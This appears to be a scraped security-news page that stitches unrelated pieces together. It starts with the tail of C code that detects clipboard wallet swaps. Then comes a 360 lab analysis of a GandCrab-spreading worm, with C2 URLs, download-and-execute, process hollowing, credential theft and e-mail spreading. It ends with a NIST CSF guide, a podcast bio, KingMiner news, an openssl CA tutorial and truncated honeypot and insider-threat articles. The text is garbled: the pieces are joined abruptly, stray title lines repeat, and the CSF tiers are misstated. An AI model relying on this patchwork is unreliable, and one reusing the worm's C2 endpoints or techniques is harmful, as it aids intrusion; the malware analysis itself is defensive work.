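    COIN_NONE, COIN_BTC, COIN_ETH, COIN_LTC, COIN_XMR,
    COIN_XRP, COIN_ZEC, COIN_DASH, COIN_DOGE
} coin_t;

/* Base58 alphabet used by most of these address formats (no 0, O, I, l). */
static const char BASE58[] =
    "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz";
static const char HEXCHARS[] = "0123456789abcdefABCDEF";

/* 1 if every byte of s from offset `from` onward belongs to `alphabet`. */
static int only_chars(const char *s, size_t from, const char *alphabet)
{
    size_t n = strlen(s);
    if (from > n)
        return 0;
    return strspn(s + from, alphabet) == n - from;
}

/* Simplified family rules (assumption for this example): legacy base58 forms
 * only; bech32 BTC/LTC addresses, for instance, are not recognised. */
coin_t classify_wallet(const char *s)
{
    size_t n = strlen(s);
    if (n == 42 && s[0] == '0' && s[1] == 'x' && only_chars(s, 2, HEXCHARS))
        return COIN_ETH;
    if (n == 0 || !only_chars(s, 0, BASE58))
        return COIN_NONE;
    if (n == 95 && (s[0] == '4' || s[0] == '8'))            return COIN_XMR;
    if (n >= 26 && n <= 35 && (s[0] == '1' || s[0] == '3')) return COIN_BTC;
    if (n >= 26 && n <= 34 && (s[0] == 'L' || s[0] == 'M')) return COIN_LTC;
    if (n >= 25 && n <= 35 && s[0] == 'r')                  return COIN_XRP;
    if (n == 35 && s[0] == 't' && (s[1] == '1' || s[1] == '3')) return COIN_ZEC;
    if (n == 34 && s[0] == 'X')                             return COIN_DASH;
    if (n == 34 && s[0] == 'D')                             return COIN_DOGE;
    return COIN_NONE;
}

/* The hijack swaps the copied address for one of the same family, so
 * "same family, different text, and the user did not copy again" is the
 * signal to alert on. Returns the family when suspicious, COIN_NONE otherwise. */
coin_t clipboard_swap_suspected(const char *copied, const char *now_in_clipboard)
{
    coin_t before = classify_wallet(copied);
    coin_t after  = classify_wallet(now_in_clipboard);
    if (before == COIN_NONE || before != after)
        return COIN_NONE;
    if (strcmp(copied, now_in_clipboard) == 0)
        return COIN_NONE;
    return before;
}

int main(void)
{
    /* Constructed sample: the well-known Bitcoin genesis address, then a
       different (made-up) base58 string of the same shape, as a swap would leave. */
    const char *copied = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa";
    const char *swapped = "1" "BBBBBBBBBB" "BBBBBBBBBB" "BBBBBBBBBB" "BBB";
    printf("family %d, swap suspected: %d\n",
           classify_wallet(copied), clipboard_swap_suspected(copied, swapped));
    return 0;
}
```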

Downloading multiple malicious modules from the built-in C2s

The worm body embeds 3 C2 servers and several obfuscated backup DNS names used to download and distribute other malware (these DNS names are currently inactive, but if the first 3 IPs are blocked or go down, the backup DNS names can be enabled to switch C2):



The following 5 file names are appended to the URLs above to form complete download links:



These 5 malicious links download and distribute other malware, hence "five poisons".

The downloaded modules are saved under %TEMP% with random names, and the corresponding Zone.Identifier stream is deleted to avoid the run-time warning:



After a successful download, a process is created to execute the file:



The modules downloaded during this analysis included: the propagation module, 2 ransomware downloaders, the stealer module, and the mining module (which malware is pushed depends on the time and the C2 server).

Mining module analysis

Decrypting a PE in memory and loading it

The mining module uses a code obfuscation style similar to the worm body, decrypting a PE in memory and loading it for execution:


Figure: decrypts the configuration file URL, mining pool addresses and other data


Figure: maps NTDLL into memory and obtains the required APIs from it, bypassing ring-3 hooks


Obtains mining configuration data via http://92.63.197.60/newup.txt

At the time of analysis the link above was already dead:


Figure: parses the configuration data, which contains the wallet address, mining port and other settings

Building the xmrig config file

Using the wallet address and other information obtained earlier, builds the config file and saves it base64-encoded.


Figure: formatting the config file


Figure: the base64-decoded config file (the URL is dead, so no valid wallet address could be obtained)

Persistence

Copies itself to the "ProgramData\GCxcrhlcfj" directory and creates an r.vbs script:


The VBS script creates a .url shortcut under the Start Menu that points to the sample itself:


Executed via wscript:


The .url shortcut is responsible for launching the miner:


Decrypting the embedded xmrig and mining inside a hollowed system process

Starts wuapp.exe in a suspended state with the mining config file as its command-line argument:


Decrypting xmrig:


Figure: decrypting xmrig

The PE decrypted in memory is XMRig version 2.8.1:


Injects code into the hollowed process:


Figure: injection into the hollowed process

Monitoring TaskMgr.exe

To hide itself, the sample continuously enumerates system processes, checking for a Task Manager process; if one is found, it kills the mining process:


Figure: process-kill code

Stealer module analysis

The stealer is written in Delphi. It steals instant-messaging chat logs, browser history, WinSCP credentials, Steam accounts, cryptocurrency wallets, email accounts, screenshots and more.

The sample tries to contact the C2 server to pull configuration (the server is already dead)


Code structure of the stealer functions:


Cryptocurrency wallets targeted:


Figure: Exodus, JAXX, MultiBit HD


Figure: Monero


Figure: Electrum, Electrum-LTC, Bitcoin Core

Instant messaging clients:


Figure: Skype chat logs and other data


Figure: Pidgin, PSI, Telegram

WinSCP:


Outlook mailbox:


Steam account data:


Steals browser history, cookies and other data (mainly targeting Firefox):


GandCrab传播新动向――五毒俱全的蠕虫病毒技术分析V1.1
GandCrab传播新动向――五毒俱全的蠕虫病毒技术分析V1.1
GandCrab传播新动向――五毒俱全的蠕虫病毒技术分析V1.1

火狐浏览器sqlite数据库

Analysis of the ransomware module

The two ransomware modules downloaded by the parent sample are downloaders with static anti-detection applied. One targets the "China" region; the other drops the GandCrab ransomware in the "Vietnam" and "China" regions. Below is the download logic for the China/Vietnam variant; the China-only variant is similar and is not analysed again here.

Region list

The module fetches a list of region codes from http://92.63.197.48/geo.php and compares them with "CN" and "VN"; if either region matches, it starts downloading the GandCrab ransomware:

Comparing the region list

Downloading the GandCrab parent from the C2 and executing it

The downloaded GandCrab parent is version 5.0.4, which is no different from commonly seen builds, so it is not analysed again here:
Analysis of the spreading module

The spreading module again uses static anti-detection and sets up persistence, then spreads by sending e-mails with malicious attachments over SMTP. The attachment is an archive containing a malicious JS script, which ultimately uses PowerShell to download and run this worm's parent downloader.

Persistence setup

It copies itself into a directory it creates under the Windows directory, renamed wincfgrmgr32:

It registers itself to run at boot via the registry:

Resolving a mail server address via aol.com and testing connectivity

Mail server: mx-aol.mail.gm0.yahoodns.net

Downloading and packaging the JS downloader script

The malicious JS script is downloaded from the C2 at http://ssofhoseuegsgrfnu.ru/m/get.js. The JS is a downloader; it is saved in the TEMP directory under a random file name with a .jpg extension.

Connecting to the server to download the JS file

The obfuscated JS code

The JS script is then compressed into a zip archive:

The zipped JS file is then base64-encoded and saved as %TEMP%\<random file name>.jpg:

Base64 encoding

Sending malicious e-mail to random recipients over SMTP

A list of target mailboxes is fetched from the C2 (http://ssofhoseuegsgrfnu.ru/m/xxx.txt):

The module reads addresses at random from this mailbox list and sends malicious e-mail over SMTP, attaching the zipped JS script prepared earlier:

Sending malicious e-mail over SMTP

Execution of the malicious JS script

Once the malicious JS script runs on the victim's machine, it uses PowerShell to download and execute this worm's parent:

Process chain

Related IOCs (MD5 hashes, C2 addresses, URLs and wallet addresses):


Summary and security recommendations

From the analysis we can see that this worm has started distributing the GandCrab ransomware, mainly targeting China and Vietnam. Its distribution channels range from e-mail attachments to USB drives, a much wider reach than any single method. Whether the distributors are also counting on weaker security awareness among Chinese users cannot be ruled out; in any case, this new distribution trend deserves close attention.

Based on the technical characteristics of this malware and on previous distribution methods, we offer the following security recommendations:

- Do not open e-mail attachments of unknown origin
- Disable the USB "AutoRun" feature in Windows
- Apply all operating-system security patches and keep web, database and other services up to date so that malware cannot spread through vulnerabilities
- Avoid weak passwords: use complex passwords and limit failed-login attempts to prevent brute-force attacks
- Install antivirus software, scan regularly, and keep virus definitions updated so the software keeps working well
- Raise security awareness, keep good browsing habits, and back up important data

About the 360 Endpoint Security Lab

The 360 Endpoint Security Lab is made up of experienced malware researchers who focus on analysing and researching common viruses, trojans, worms, ransomware and other malicious code. It is dedicated to providing rapid malware alerting and response services to government and enterprise customers in China, and performed well during the handling of the WannaCry, Petya and Bad Rabbit outbreaks, earning wide praise from those customers.

Drawing on 360's experience protecting the endpoints of 1.3 billion Internet users, and built on the 360 Tianqing next-generation endpoint security management system, the lab offers customers simple and effective endpoint security management concepts, complete endpoint solutions and customised security services, helping government and enterprise customers solve intranet security and management problems and keep their endpoints secure.

About the 360 Tianqing next-generation endpoint security management system

360 Tianqing is an integrated solution from 360 Enterprise Security Group for endpoint security in government and enterprise organisations, trusted on 33 million endpoints of Chinese government and enterprise customers. Designed around functional, platform and data integration, with security protection at its core, operations control as its focus, visual management as its support and reliable service as its guarantee, it helps customers build sixteen basic security capabilities: endpoint antivirus, intrusion prevention, security management, software distribution, patch management, secure USB drives, server hardening, network access control, control of unauthorised outbound connections, operations control, host auditing, mobile-device management, asset discovery, identity authentication, data encryption and data-leak prevention. It also helps customers build advanced threat-defence capabilities such as endpoint threat detection, response and triage, and provides endpoint security governance capabilities such as security planning, strategic analysis and security decision-making.

Applying the NIST Cybersecurity Framework in Five Steps

Actionable advice on tailoring the US National Institute of Standards and Technology (NIST) security roadmap to your company's needs.

The first version of the NIST Cybersecurity Framework (NIST CSF) was released in 2014 to help organisations of all kinds strengthen their cyber defences; it was recently updated to version 1.1. The framework was compiled at President Obama's direction by cyber-security professionals from government, academia and industry, and was brought into federal policy under the Trump administration.

Although most companies recognise the value of this beneficial collaboration to improve the cyber security of all enterprises, tailoring and implementing the framework is easier said than done. The content of the NIST CSF is public and anyone can consult it, so it is not repeated here. What we discuss here are five steps that can help a company apply the NIST CSF realistically to its own situation.

Step 1: Set goals

Before starting to consider implementing the NIST CSF, a company must first focus on setting its own goals. The first difficulty usually encountered is reaching company-wide agreement on the level of risk tolerance. There is often a disconnect between senior management and the IT department over what constitutes an acceptable level of risk.

First, draft a governance agreement that defines exactly what level of risk is acceptable. Everyone must agree on this before moving to the next step. It is also important to plan the budget and to set implementation priorities and the departments to focus on.

Starting with a single department, or a handful of departments, makes a lot of sense. A pilot lets you learn which approaches work and which are wasted effort, and helps you identify the right tools and best practices for the later broad rollout. A pilot project can help you build a deeper implementation and estimate the budget more accurately.

Step 2: Create a detailed profile

The next step is to dig deeper and adapt the framework to the company's specific business needs. The NIST Framework Implementation Tiers help you understand where you currently are and where you need to be. They cover three areas:

- Risk management process
- Integrated risk management program
- External participation

Like most of the NIST CSF, these are not set in stone and can be adjusted to the company's specific needs. You can also categorise them as people, process and tools, or add one or two categories of your own to the framework.

Each of the three areas has four tiers.

Tier 1, Partial: generally indicates an uncoordinated, inconsistent and reactive cyber-security posture.

Tier 2, Risk Informed: there is some risk awareness, but planning is still consistent.

Tier 3, Repeatable: indicates company-wide CSF standards and consistent policy.

Tier 4, Adaptive: refers to proactive threat detection and prediction.

The higher the tier, the more complete the implementation of the CSF standard, but it is best to adjust these tiers to fit your own goals. You can use customised tiers to set target scores, but make sure all stakeholders agree before proceeding. The most effective implementation is one carefully tailored to the specific company and business.

Step 3: Assess the current state

With the first two steps done, it is time to perform a detailed risk assessment to establish your current state. Ideally you have both internal assessments by specific functional departments and an independent assessment of the whole company. Look for open-source tools and commercial software that can measure your target areas and train staff to use them, or hire a third party to do the risk assessment. Examples include vulnerability scanners, CIS benchmark tests, phishing tests and behavioural analysis. Make sure the people performing the risk assessment do not know what your target scores are.

The CSF implementation team should collect and check the final scores before presenting them to key stakeholders. The purpose of the assessment is to give the company a clear understanding of the security risks to its operations (including mission, functions, image or reputation), assets and personnel. The process should identify and fully document vulnerabilities and threats.

For example, in the chart below the company has marked out three functional areas: policy, network and applications. These may be spread across a hybrid cloud, or split across different environments so they can be tracked at a finer level; in that case you also need to consider whether different department heads should be responsible for on-premises and cloud deployments.

The heat map on the left lists the different CSF functions and can be expanded to any granularity. It uses a four-level scale: green means everything is OK, yellow means the area still needs some work, and red means serious analysis and correction are still required. Here, the "Identify" core function has been broken down so that a core group can compare assessment scores across business units. SME and core scores are averaged against the enterprise targets, and the risk gap is then calculated. A large gap means remediation needs to be accelerated. In this chart, the company's "Protect" and "Respond" functions are the weakest.

[Figure: CSF heat map across the policy, network and application areas]

Step 4: Gap analysis action plan

With a deep understanding of the risks and potential business impact, you can carry out the gap analysis. Compare your actual scores with your target scores; a heat map is a good way to present the results in an intuitive, easy-to-understand form. Any significant difference immediately highlights an area you should pay attention to.

You need to identify the work required to close the gap between current and target scores, find a set of actions that can raise the scores, and discuss with all key stakeholders the priority in which to carry them out. Specific project requirements, budget considerations and staffing levels may all affect your plan.

Step 5: Implement the action plan

The four steps above have given you a clear picture of your current defences, a set of goals that fit your company, a comprehensive gap analysis and a series of remediation actions, so you have finally reached the point of implementing the NIST CSF. Treat your first implementation as an opportunity to document the process and create training material for the later broad rollout.

Implementing the action plan is not the end: you still need to set benchmarks to test its effectiveness and keep re-evaluating the framework to make sure it meets expectations. This should include continuous iteration and validation with key decision makers. To get the most benefit you need to refine the implementation process and further align the NIST CSF with your business needs.

The NIST Cybersecurity Framework (NIST CSF) version 1.1 document:

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

Edward Preston on Building a Global Sales Force


Edward Preston can talk to anyone and everyone about anything. And that is a good thing, because everyone needs protection from the cyber threats that are out there.

After building a global inside sales team at Cylance, he now is bringing enterprise-level protection to the consumer, as Global Director of Consumer Sales.

When Edward talks, it’s worthwhile to listen.


About Edward Preston

Edward Preston ( @eptrader ) has an eclectic professional background that stretches from the trading floors of Wall Street, to data centers worldwide. Edward started his career in the finance industry, spending over 15 years in commodities and foreign exchange. With a natural talent for motivating, coaching, and mentoring loyal, goal-oriented sales teams, Edward has a track record for building effective sales teams who have solid communication lines with executive management.



About Matt Stephenson

Insecurity Podcast host Matt Stephenson ( @packmatt73 ) leads the Security Technology team at Cylance, which puts him in front of crowds, cameras, and microphones all over the world. He is the regular host of the InSecurity podcast and host of CylanceTV .

Twenty years of work with the world’s largest security, storage, and recovery companies has introduced Stephenson to some of the most fascinating people in the industry. He wants to get those stories told so that others can learn from what has come before.

Cyber Security Firm Check Point Research Reports of ‘Evolving’ Monero Cryptoja ...


Cyber security firm Check Point Research has found that the KingMiner cryptojacker targeting the cryptocurrency Monero (XMR) is "evolving," according to a blog post from the company published Nov. 30.

KingMiner was purportedly first detected in mid-June and has since evolved into two improved versions. The malware attacks Windows servers, using various evasion methods to avoid detection. Per Check Point data, several detection engines have registered significantly decreased detection rates, while sensor logs show a growing number of KingMiner attacks.

The firm has been monitoring KingMiner activity over the past six months and concluded that the malware has evolved in two new versions. The blog post further explains:

“The malware continuously adds new features and bypass methods to avoid emulation. Mainly, it manipulates the needed files and creates a dependency which is critical during emulation. In addition, as part of the malware’s ongoing evolution, we have found many placeholders for future operations or upcoming updates which will make this malware even harder to detect.”

Check Point has determined that KingMiner uses a private mining pool to bypass detection of its activities: the pool's API is turned off and the wallet is not used in any public mining pools. The attacks are reportedly widely spread around the world.

According to the company’s findings, the malicious software attempts to guess passwords of the servers it attacks. Once a user downloads and executes the Windows Scriptlet file, it reportedly identifies the relevant Central Processing Unit (CPU) architecture of the device and downloads a payload ZIP file based on the detected CPU architecture.

The malware eventually destroys the relevant .exe file process and deletes the files themselves, if older versions of the attack files exist. Check Point also notes that the file is not an actual ZIP file, but rather an XML file, which will circumvent emulation attempts.

As Cointelegraph reported yesterday, Russian internet security company Kaspersky Labs has found that crypto mining malware became increasingly popular among botnets in 2018. During the Q1 2018 cryptojacking “boom,” the share of cryptojacking malware downloaded by botnets, out of total files, hit 4.6 percent ― as compared with 2.9 percent in Q2 2017.

Botnets are reportedly therefore becoming increasingly viewed as a means of spreading crypto mining malware, with cybercriminals increasingly viewing cryptojacking as more favorable than other attack vectors.


Source: Cointelegraph


构建自己的CA


My recent project connects to the People's Bank of China's much-vaunted "CNAPS2" system through UnionPay. They require that messages be signed in hardware using the national SM2 standard, so the company brought in hardware signing appliances from two vendors to try out, and I was asked to evaluate them to see whether the advertised figures were inflated.

Because SM2 is so non-mainstream, and cryptography is complicated enough already, I started by testing signing and verification with RSA. A hardware signer's certificate private key is generated by, and kept inside, the device (and usually cannot be exported); the device produces a certificate request, which a CA then signs. So, for convenience, I built my own CA, and can now issue certificates in whatever form I like!

1. Building the CA

1.1 openssl configuration

Almost every Linux system comes with the openssl tool installed; its configuration files and working directory live under /etc/pki/.

openssl works out of the box, but editing a few settings in the /etc/pki/tls/openssl.cnf configuration file, such as the certificate validity period, the default country and region, and the rule-checking policy for new certificate requests, makes issuing certificates later much more convenient: many fields can simply use the defaults and you can press Enter all the way through.

default_days = 1095                        # how long to certify for, 3 years
dir = /etc/pki/CA                          # Where everything is kept
countryName_default = CN
stateOrProvinceName_default = Guangdong
localityName_default = Shenzhen
0.organizationName_default = cpplus.cc Co.LTD
organizationalUnitName_default = R&D

As the configuration shows, /etc/pki/CA is the CA's working directory. Switch to that directory and run:

[root@cpplus CA] touch index.txt serial
[root@cpplus CA] echo 0001 > serial

index.txt will list the serial numbers and DNs of the certificates issued later, while serial is a globally incrementing index file: every time a certificate is issued, the serial number in this file is incremented.

1.2 Building the root certificate

The actual sign/verify and encrypt/decrypt operations are performed with the private/public key pair; the certificate merely attests to the legitimate identity of that key pair. Certificate management is a strongly centralised hierarchy: the root certificate at each level vouches for the certificates it issues, and the top-level root certificates are run by reputable companies or organisations and come pre-installed in operating systems or browsers. A privately issued root certificate can only be imported into the system manually by the user.

The command below generates the private key for the root certificate; keep it safe! Because the certificate is bound to the host, set the hostname as well, both with the hostname command and in the /etc/sysconfig/network file.

[root@cpplus CA]# openssl genrsa -out private/cakey.pem 2048
Generating RSA private key, 2048 bit long modulus
..........................+++
.....................+++
e is 65537 (0x10001)
[root@cpplus CA]# chmod go-rwx private/cakey.pem
[root@cpplus CA]# ls -l private/cakey.pem
-rw------- 1 root root 1679 Nov 15 09:46 private/cakey.pem
[root@cpplus CA]# hostname cpplus.cc

Then, skipping the certificate request file, we generate the root certificate directly from the private key above. Validity is set to 3 years; on success the root certificate file cacert.pem is created in the current directory.

[root@cpplus CA]# openssl req -new -x509 -days 1095 -key private/cakey.pem -out cacert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [CN]:
State or Province Name (full name) [Guangdong]:
Locality Name (eg, city) [Shenzhen]:
Organization Name (eg, company) [cpplus.cc Co.LTD]:
Organizational Unit Name (eg, section) [R&D]:
Common Name (eg, your name or your server's hostname) []:cpplus.cc
Email Address []:admin@cpplus.cc
[root@cpplus CA]#

The following command shows the certificate's details in a more human-readable form.

[root@cpplus CA]# openssl x509 -in cacert.pem -text -noout

This cacert.pem certificate can be distributed to anyone or any organisation; once they mark it as a trusted root certificate, every certificate issued under that root is trusted by default. On Windows you can rename cacert.pem to cpplus.cc.cer and then install it by double-clicking. Likewise, if it is needed on a hardware signer, it can be imported there as a trusted root certificate.

2. Issuing certificates

Now that the CA is built, it can issue new certificates for applications or customers. Switch to another directory for this.

2.1 The customer generates a certificate request

Although this appears in the same article as building the CA, this step is actually performed by the certificate applicant on their own machine. The private key produced is kept by the applicant and is not given to the CA: the customer only needs to generate a private key, create a certificate request from it, and take that request to the CA to have a new certificate issued.

Creating the private key and the certificate request can both be done "in software" with the openssl tool, as in the two steps of the example below.

[root@cpplus sz.cpplus.cc]# openssl genrsa -out sz.cpplus.cc.key 2048
Generating RSA private key, 2048 bit long modulus
.............................................................................................+++
....................................................+++
e is 65537 (0x10001)
[root@cpplus sz.cpplus.cc]# openssl req -new -key sz.cpplus.cc.key -out sz.cpplus.cc.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [CN]:
State or Province Name (full name) [Guangdong]:
Locality Name (eg, city) [Shenzhen]:
Organization Name (eg, company) [cpplus.cc Co.LTD]:
Organizational Unit Name (eg, section) [R&D]:
Common Name (eg, your name or your server's hostname) []:sz.cpplus.cc
Email Address []:admin@sz.cpplus.cc

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

If hardware signing is to be used, the signer's management tool is used to have the device generate the private key and then the certificate request from it. After obtaining the newly issued certificate from the CA, the certificate is imported into the signer and matched to the original private key, and it is ready to use. The benefits of a signer are that dedicated hardware signs and verifies faster, and that the private key is forced to stay inside the device rather than on some computer's disk, so it is far less likely to leak.

2.2 Issuing the new certificate

Once the CA has the applicant's certificate request, it can issue the certificate. Although this is a single command, beforehand the CA must strictly verify the applicant's identity: the CA is responsible for the certificates it issues, and careless issuance damages its reputation; in serious cases the CA's root certificate may be marked untrusted by mainstream device or software vendors, after which the CA can no longer issue trusted certificates.

[root@cpplus sz.cpplus.cc]# openssl ca -in sz.cpplus.cc.csr -out sz.cpplus.cc.crt
Using configuration from /etc/pki/tls/openssl.cnf
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 1 (0x1)
        Validity
            Not Before: Nov 15 01:58:27 2018 GMT
            Not After : Nov 14 01:58:27 2021 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Guangdong
            organizationName          = cpplus.cc Co.LTD
            organizationalUnitName    = R&D
            commonName                = sz.cpplus.cc
            emailAddress              = admin@sz.cpplus.cc
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                DD:FC:EF:3D:12:43:F1:9D:93:E0:F1:F0:E8:C8:FE:CD:7A:CB:D6:66
            X509v3 Authority Key Identifier:
                keyid:C7:6F:BB:75:8F:5C:75:F5:E5:81:BD:BA:EB:23:18:CB:DD:FC:56:F0

Certificate is to be certified until Nov 14 01:58:27 2021 GMT (1095 days)
Sign the certificate? [y/n]:y

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated

The log shows that the issuance was committed and the new certificate was written to the current directory. Looking at the record files described earlier, their data has been updated too:

[root@cpplus sz.cpplus.cc]# ls /etc/pki/CA/newcerts/
01.pem
[root@cpplus sz.cpplus.cc]# cat /etc/pki/CA/serial
02
[root@cpplus sz.cpplus.cc]# cat /etc/pki/CA/index.txt
V	211114015827Z		01	unknown	/C=CN/ST=Guangdong/O=cpplus.cc Co.LTD/OU=R&D/CN=sz.cpplus.cc/emailAddress=admin@sz.cpplus.cc

Then take a look at the new certificate on Windows: it looks the part!


3. Testing

Once the new certificate sz.cpplus.cc.crt has been produced it can be handed to the customer. With the certificate and the earlier private key the applicant can do many things and run many tests. For instance, we can use the CA's root certificate to verify that the newly generated certificate is valid:

[root@cpplus sz.cpplus.cc]# openssl verify -CAfile /etc/pki/CA/cacert.pem sz.cpplus.cc.crt
sz.cpplus.cc.crt: OK

The openssl toolkit also provides a simple HTTPS test server, which can be used to check whether the certificate works for HTTP over SSL. Try it with the command below:

[root@cpplus sz.cpplus.cc]# openssl s_server -accept 443 -cert sz.cpplus.cc.crt -key sz.cpplus.cc.key
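The workflow of sections 1 to 3 driven non-interactively from Python, added here as an example and not part of the original post; it assumes the openssl binary is on PATH, reuses the post's DN values, and writes everything to a temporary directory instead of /etc/pki/CA.

```python
"""Build a throw-away CA, issue one certificate with `openssl ca`, and verify
it against the root, the same openssl commands as the post but with -subj and
-batch so nothing prompts.  Added example; assumes openssl is on PATH."""
import os
import subprocess
import tempfile

# Minimal openssl.cnf with what `openssl req` and `openssl ca` need; the layout
# mirrors /etc/pki/CA from the post (index.txt, serial, newcerts, private/).
CA_CONF = """
[ ca ]
default_ca = CA_default
[ CA_default ]
dir             = {dir}
database        = $dir/index.txt
serial          = $dir/serial
new_certs_dir   = $dir/newcerts
certificate     = $dir/cacert.pem
private_key     = $dir/private/cakey.pem
default_md      = sha256
default_days    = 1095
policy          = policy_match
x509_extensions = usr_cert
[ policy_match ]
countryName            = match
stateOrProvinceName    = match
localityName           = optional
organizationName       = match
organizationalUnitName = optional
commonName             = supplied
emailAddress           = optional
[ usr_cert ]
basicConstraints       = CA:FALSE
subjectKeyIdentifier   = hash
authorityKeyIdentifier = keyid
[ req ]
distinguished_name = req_dn
x509_extensions    = v3_ca
[ req_dn ]
[ v3_ca ]
basicConstraints     = critical, CA:TRUE
keyUsage             = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
"""
CA_SUBJ = "/C=CN/ST=Guangdong/L=Shenzhen/O=cpplus.cc Co.LTD/OU=R&D/CN=cpplus.cc"
CLIENT_SUBJ = ("/C=CN/ST=Guangdong/L=Shenzhen/O=cpplus.cc Co.LTD/OU=R&D"
               "/CN=sz.cpplus.cc/emailAddress=admin@sz.cpplus.cc")


def openssl(*args):
    """Run one openssl subcommand, raising if it fails."""
    return subprocess.run(["openssl", *args], check=True, capture_output=True, text=True)


def build_ca(ca_dir):
    """Section 1: directory layout, CA private key, self-signed root cacert.pem."""
    os.makedirs(os.path.join(ca_dir, "private"))
    os.makedirs(os.path.join(ca_dir, "newcerts"))
    open(os.path.join(ca_dir, "index.txt"), "w").close()  # touch index.txt
    with open(os.path.join(ca_dir, "serial"), "w") as f:
        f.write("01\n")
    conf = os.path.join(ca_dir, "openssl.cnf")
    with open(conf, "w") as f:
        f.write(CA_CONF.format(dir=ca_dir))
    key = os.path.join(ca_dir, "private", "cakey.pem")
    openssl("genrsa", "-out", key, "2048")
    os.chmod(key, 0o600)  # chmod go-rwx private/cakey.pem
    openssl("req", "-new", "-x509", "-days", "1095", "-key", key, "-subj", CA_SUBJ,
            "-config", conf, "-out", os.path.join(ca_dir, "cacert.pem"))
    return conf


def issue_cert(conf, work_dir, name):
    """Section 2: applicant key and CSR, then `openssl ca` signs it (-batch answers y)."""
    key, csr, crt = (os.path.join(work_dir, name + ext) for ext in (".key", ".csr", ".crt"))
    openssl("genrsa", "-out", key, "2048")
    openssl("req", "-new", "-key", key, "-subj", CLIENT_SUBJ, "-config", conf, "-out", csr)
    openssl("ca", "-batch", "-config", conf, "-in", csr, "-out", crt)
    return crt


def verify_cert(ca_dir, crt):
    """Section 3: `openssl verify -CAfile cacert.pem`; True when it reports OK."""
    res = subprocess.run(["openssl", "verify", "-CAfile", os.path.join(ca_dir, "cacert.pem"), crt],
                         capture_output=True, text=True)
    return res.returncode == 0 and res.stdout.strip().endswith(": OK")


def demo():
    """Run the whole cycle and return what the post inspects afterwards."""
    with tempfile.TemporaryDirectory() as tmp:
        ca_dir, work = os.path.join(tmp, "CA"), os.path.join(tmp, "sz.cpplus.cc")
        os.makedirs(work)
        conf = build_ca(ca_dir)
        crt = issue_cert(conf, work, "sz.cpplus.cc")
        with open(os.path.join(ca_dir, "serial")) as f:
            serial = f.read().strip()          # "02" after the first certificate
        with open(os.path.join(ca_dir, "index.txt")) as f:
            index = [line for line in f if line.strip()]  # one "V ..." row per cert
        return {"verified": verify_cert(ca_dir, crt), "serial": serial,
                "issued": len(index), "status": index[0].split("\t")[0]}
```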

The screenshots below show the request and authentication information printed during the access:

If you need certificates issued for testing or experimenting, feel free to contact me ;-)

4. Afterword

Certificates issued this way for the signer's requests, once imported into the hardware signer, worked for both signing and verification.

As for the signers, both vendors' devices were relatively cheap, which confirmed the old saying: cheap goods are no good. One vendor's management tool is written in MFC: it only runs on Windows, and its interface is so ugly and unusable that it would not pass as a first-year computing student's homework. The other has at least moved on to a Tomcat-based web UI, but links often return error pages and some pages show garbled text. Is it only the Internet industry that cares about user experience any more?

Setting the UI aside and looking at the low-level API, neither vendor's C/C++ interface uses a single const keyword!

Of course, as a vendor representative told me: cryptographic appliances (signers, encryption machines and so on) are a relatively closed industry with a small circle; vendors look at each other, and as long as everyone's product is passable that seems to be enough, since large customers' procurement tenders involve many other factors.

End of article.

Honeypots in the Cloud

Why Use Honeypots?

For an organization with a reasonably complete security posture, including a mature threat intelligence capability, implementing a so-called "honeypot" should be considered. A honeypot is like a digital trap set for potential attackers. It lures attackers in by mimicking a target they were looking for, sometimes with deliberately built-in vulnerabilities that appear to be waiting to be exploited.

Once attackers use the honeypot system, believing they have reached the intended target, all their actions are recorded and all modified and newly dropped files are captured. In this way a great deal can be learned about potential adversaries, their Tools, Techniques and Procedures (TTPs), and how they would circumvent the organization's actual production security controls. It allows truly proactive security intelligence gathering, although there are some caveats.

The Issue With Honeypots

A honeypot is a great weapon in the arsenal of defensive security teams. Its use does, however, come with some challenges.

The obvious one is the risk that an attacker successfully exploits a honeypot and then manages to move laterally into the actual production network. It is critical to isolate a honeypot from any other network! This seems like a simple task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.

Another challenge is the amount of time, and with it the cost, that comes with managing a honeypot. The system needs to be configured and maintained, of course, but that is not all: the captured activity has to be used by the organization's security teams for it to be of any value, and structuring it to fit within operational processes takes a lot of time. The information will (Read more...)

Top 5 Ways to Identify and Address Insider Threats


A recent report commissioned by CA Technologies threw up some very interesting and alarming data about the threats that an insider can pose to an organization. The report found that:

- 90% of organizations felt that insiders were a serious threat
- 53% had experienced an insider attack in the last 12 months
- 55% of the threat came from privileged or IT users
- 57% identified business confidential data as being the target of an insider threat

One of the biggest problems with an insider threat is that it is just that ― an insider. An insider can be a work colleague, a freelancer, someone from head office or a worker from a partner company. An insider, is, by definition, anyone who has an intrinsic or close connection to an organization.

Insiders can be of both accidental and malicious types. And, not all malicious insiders know they have become an insider threat ― they are, instead, “proxy insider threats,” being used by malicious outsiders to get inside the business.

It is a complicated business to spot an insider and to then deal with them. This article will look at some ways to check if Jan from Accounts is after your data.

5 Ways That Insiders Become Threats and How to Deal With Them

The best way to know if an insider will become a threat is to know where the threats lie. Understanding the drivers behind a data breach or IT sabotage offers you an insight into the types of indicators and behavior that foretells trouble ahead.

1. The Leaver

The Problem: McAfee reports that 43% of data breaches start with an insider. Sometimes the issue begins just as the insider leaves. The case of Jason Needham demonstrates this well.

Mr. Needham worked for the Allen and Hoshall engineering firm but left in (Read more...)

